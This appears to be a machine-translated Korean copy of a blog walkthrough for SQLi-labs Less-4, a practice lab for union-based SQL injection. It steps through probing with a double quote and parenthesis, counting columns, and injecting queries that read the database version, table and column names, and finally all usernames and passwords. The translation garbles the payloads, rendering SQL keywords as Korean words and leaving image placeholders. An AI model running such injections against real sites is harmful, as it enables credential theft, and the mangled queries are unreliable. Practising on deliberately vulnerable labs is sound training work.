SQLI - 연구실 적은-4

적은-4 GET - 오류를 기반으로 두 배 지수 - 문자열
1.原页面그림 삽입 설명 여기
2.?id=1 그림 삽입 설명 여기
3.?id=1 '
그림 삽입 설명 여기
4 그림 삽입 설명 여기
' ''1 \ '') LIMIT 0,1 '->' '(1) \ '') LIMIT 0,1
SQL :
선택 login_name은, 관리자 암호가 어디 ID = ( "ID") 제한 0,1

. = 1 5.id ") - + 그림 삽입 설명 여기
6.?id=1") 3 + 주문에 의해 그림 삽입 설명 여기
7 버전 정보 데이터베이스 쿼리
ID = 0 ") 1 SELECT 연합 (EU), 버전 (), 3 +?. 그림 삽입 설명 여기
(8) 데이터베이스 쿼리 및 사용자 이름
? 위에서 언급 한 ID = 0 "연합)을 선택, 데이터베이스 (), 사용자 () - + 그림 삽입 설명 여기
9 조회 테이블 이름
? ID = 0") 조합을 선택 (선택 GROUP_CONCAT (TABLE_NAME 1)을 INFORMATION_SCHEMA.TABLES 어디에서 TABLE_SCHEMA = ' 보안 '), 사용자 () - +
그림 삽입 설명 여기
10. 열 이름 쿼리
ID = 0 ") 노조가 1을 선택 ? INFORMATION_SCHEMA.COLUMNS에서 (일부 GROUP_CONCAT (COLUMN_NAME) 여기서 TABLE_SCHEMA ='보안 '과 TABLE_NAME ='사용자 '), 3 그림 삽입 설명 여기
11. 쿼리 사용자 이름과 암호
? ID = 0 ") 조합을 선택 사용자 - +에서 1, GROUP_CONCAT (사용자 이름, 0x3a, 비밀번호), (3)
그림 삽입 설명 여기

게시 15 개 원래 기사 · 원 찬양 2 · 조회수 300

추천

출처blog.csdn.net/qq_42630215/article/details/104698925